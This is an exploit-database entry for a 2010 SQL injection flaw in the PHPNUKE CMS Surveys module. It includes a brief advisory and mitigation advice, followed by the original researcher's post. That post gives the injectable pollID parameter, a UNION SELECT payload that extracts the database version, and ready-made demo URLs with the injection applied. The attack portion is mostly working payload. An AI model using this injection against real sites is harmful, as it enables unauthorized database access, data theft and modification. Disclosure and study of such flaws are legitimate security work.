PHPNUKE CMS ( Survey&poll ) SQLi Vulner

vendor:

PHPNUKE CMS

by:

SENOT

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHPNUKE CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PHPNUKE CMS ( Survey&poll ) SQLi Vulner

An SQL injection vulnerability exists in PHPNUKE CMS Survey&poll module. An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable module. This can allow the attacker to gain access to sensitive information from the database, modify data, execute administration operations on the database, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL statements. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#############################################################################################################
## Tittle :PHPNUKE CMS ( Survey&poll ) SQLi Vulner                                                         ##
## Author : SENOT (selalungantuk_exe@yahoo.com)                                                            ##
## Homepage : http://www.indonesiancoder.com                                                               ##
## Date : Thursday  04 March, 2010                                                                         ##
## Location : - INDONESIA -                                                                                ##
#############################################################################################################
[+] CMS INFO
[+] Name : PHPNUKE CMS
[+] Vendor : http://phpnuke.org/
[+] Download : http://phpnuke.org/modules.php?name=Downloads
[+] Vulnerability : SQL
[+] Dork : "Dork Just for newbie"
#############################################################################################################

[ Vulnerable File ]

[+] http://127.0.0.1/[senot]/modules.php?name=Surveys&op=results&pollID=[INDONESIANCODER]


[ XpL ]

[+] +and+1=2+union+select+1,version(),3,4--


[ DEMO ]

[+] http://server/modules.php?name=Surveys&op=results&pollID=5+and+1=2+union+select+1,version%28%29,3,4--

[+] http://server/default.php?go=modules.php%3Fname%3DSurveys%26op%3Dresults%26pollID%3D132+and+1=2+union+select+1,version%28%29,3,4--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER - ServerIsDown - IndonesianHacker - SoldierOfAllah
[+] kaMtiEz,Tukulesto,M3NW5,arianom,gonzhack,tucker,saint
[+] B4YU5154,nuxdtyals,qu1ck_51lv3r,Mr.J0k3R,brandal_666
[+] elv1n4,Mr.fribo,Jack,VycOd,x-shadow,bobyhikaru,deril0101
[+] ex girlfriend ( you Are my Spirit )
[+] And you

[+] Get the codes and Feel the Soul ( INDONESIANCODER TEAM )